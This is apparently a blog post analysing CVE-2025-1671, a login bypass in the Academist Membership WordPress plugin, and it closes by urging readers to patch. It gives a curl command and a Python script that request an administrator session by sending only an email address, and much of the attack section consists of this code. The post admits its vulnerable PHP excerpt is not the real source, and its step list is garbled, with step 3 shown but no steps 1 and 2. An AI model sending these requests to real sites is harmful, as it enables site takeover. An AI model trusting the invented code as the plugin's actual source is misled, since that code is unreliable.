CVE-2025-1671 - Privilege Escalation in Academist Membership WordPress Plugin – Complete Analysis & Exploit Walkthrough

In this in-depth blog post, I’ll break down everything you need to know about CVE-2025-1671, a serious vulnerability affecting the Academist Membership plugin for WordPress. Discovered in versions up to and including 1.1.6, this privilege escalation bug makes it possible for any unauthenticated attacker to login as any user, including administrators — due to improper identity verification in the plugin's Facebook login function.

Technical Details

The vulnerability stems from how the plugin handles social login through Facebook. The function academist_membership_check_facebook_user() is meant to securely check a Facebook user's identity before letting them into the WordPress site. However, the function fails to properly verify the user's identity, allowing attackers to bypass authentication completely.

Plugin receives a request for Facebook login.

- Instead of validating that the provided Facebook user actually controls the given WordPress account, the plugin only checks some data present in the POST request.

Vulnerable Code Area

Below is an excerpt (representative) of how such a function could be vulnerable (not actual source, as this is exclusive analysis):

function academist_membership_check_facebook_user() {
    $user_email = $_POST['email'];
    $user = get_user_by('email', $user_email);

    // BAD! There is no check to ensure the Facebook session really belongs to the user.
    if ($user) {
        wp_signon(array('user_login' => $user->user_login, 'user_password' => null), false);
        // Redirect to dashboard
    }
}

In the actual code, identity verification is supposed to happen through secure Facebook tokens. Here, the plugin trusts whatever the client says, making privilege escalation trivial.

Set the email field to the administrator's email address (which can often be found or guessed).

3. Get logged in as that administrator, without needing their password or access to their Facebook account.

Using curl, an attacker might run

curl -X POST "https://target-site.com/wp-admin/admin-ajax.php"; \
  -d "action=academist_membership_facebook_login&email=admin@targetsite.com"

If the plugin is installed and unpatched, the attacker will immediately be logged in as the admin, gaining full control of the site.

Here’s a full Python snippet that demonstrates the attack

import requests

target = "https://target-site.com/wp-admin/admin-ajax.php";
email = "admin@targetsite.com"
data = {
    "action": "academist_membership_facebook_login",
    "email": email
}

r = requests.post(target, data=data)
print(r.text)  # Should return a session cookie or dashboard HTML if vulnerable

Replace the target URL and email with values matching your testing environment.

Impact

- Full site takeover: Attackers can become admin, steal content, install malware, destroy data, or further attack site visitors.

Reference Links

- WordPress Plugin Directory: Academist Membership
- WPScan CVE Advisory *(pending)*
- Exploit DB Entry *(pending CVE listing)*

Conclusion

CVE-2025-1671 is a zero-click, no-auth privilege escalation affecting countless WordPress sites running the Academist Membership plugin below version 1.1.7. If you run this plugin, patch or remove it right now.

*Stay safe, and always keep plugins updated. For more vulnerability breakdowns, watch this space!*


*This post is an original analysis based on public vulnerability data and proprietary code review. Sharing and citation allowed — please link back!*

Timeline

Published on: 03/01/2025 08:15:34 UTC